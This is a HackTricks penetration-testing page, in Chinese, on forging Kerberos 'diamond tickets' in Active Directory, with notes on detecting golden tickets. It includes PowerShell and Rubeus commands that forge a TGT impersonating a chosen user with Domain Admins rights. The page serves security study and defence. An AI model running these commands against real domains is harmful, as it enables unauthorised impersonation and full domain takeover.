hacktricks/windows-hardening/active-directory-methodology/diamond-ticket.md

钻石票据

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品The PEASS Family

• 获取官方PEASS和HackTricks周边产品

• 加入💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm。

• 通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。

钻石票据

就像黄金票据一样，钻石票据是一种可以用来以任何用户身份访问任何服务的TGT。黄金票据完全是离线伪造的，使用该域的krbtgt哈希进行加密，然后传递到登录会话中供使用。因为域控制器不会跟踪它们（或它）合法发行的TGT，所以它们会欣然接受使用其自己krbtgt哈希加密的TGT。

检测黄金票据使用的两种常见技术：

• 查找没有相应AS-REQ的TGS-REQ。
• 查找具有荒谬值的TGT，例如Mimikatz的默认10年有效期。

钻石票据是通过修改由DC发行的合法TGT的字段来创建的。这是通过请求一个TGT，使用域的krbtgt哈希解密它，修改票据的所需字段，然后重新加密它来实现的。这克服了黄金票据的两个前述缺点，因为：

• TGS-REQ将有一个前置的AS-REQ。
• TGT是由DC发行的，这意味着它将具有来自域的Kerberos策略的所有正确详细信息。即使在黄金票据中可以准确伪造这些信息，但这更复杂且容易出错。

# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.

\

☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？你想在 HackTricks 中看到你的公司广告吗？或者你想获得PEASS 的最新版本或下载 HackTricks 的 PDF 版本吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品——The PEASS Family

• 获得官方 PEASS & HackTricks 商品

• 加入 💬 Discord 群组 或 Telegram 群组，或者在 Twitter 上 关注我 🐦@carlospolopm。

• 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。